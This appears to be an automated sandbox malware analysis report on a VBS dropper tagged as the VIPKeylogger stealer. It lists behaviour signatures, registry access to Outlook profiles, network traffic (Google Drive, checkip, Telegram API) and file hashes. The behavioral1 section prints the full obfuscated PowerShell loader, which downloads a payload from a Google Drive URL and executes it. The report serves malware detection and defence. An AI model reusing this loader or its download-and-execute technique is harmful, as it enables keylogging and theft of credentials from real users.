Malware Analysis Report

2024-11-30 15:01

Sample ID 241031-echfws1jcl
Target bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs
SHA256 bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3
Tags
discovery execution vipkeylogger collection keylogger stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs was found to be: Known bad.

Malicious Activity Summary

discovery execution vipkeylogger collection keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 03:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 03:47

Reported

2024-10-31 03:50

Platform

win7-20240708-en

Max time kernel

150s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? 
GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. 
DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco 
idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 03:47

Reported

2024-10-31 03:50

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.180.3:80 o.pki.goog tcp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_anvzmai3.sj1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 806286a9ea8981d782ba5872780e6a4c
SHA1 99fe6f0c1098145a7b60fda68af7e10880f145da
SHA256 cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

C:\Users\Admin\AppData\Roaming\Databaands.Cag

MD5 f6579ea1ab825b27780f29716bf33381
SHA1 2f4b5633c9540b3010c53fc058efc3d6d77642f3
SHA256 88ae5c99126911132ed637b343c055ff1be103986116f998ef7247a573e2d823
SHA512 2977eacd74cfb217d8ec3ea87441a8211b7ffa2103e083b3e690fc9604615929159aad52fd2f2c35b53a3656298c8b2c0c08e51d5953f9c8f2ebc472b30a4e67
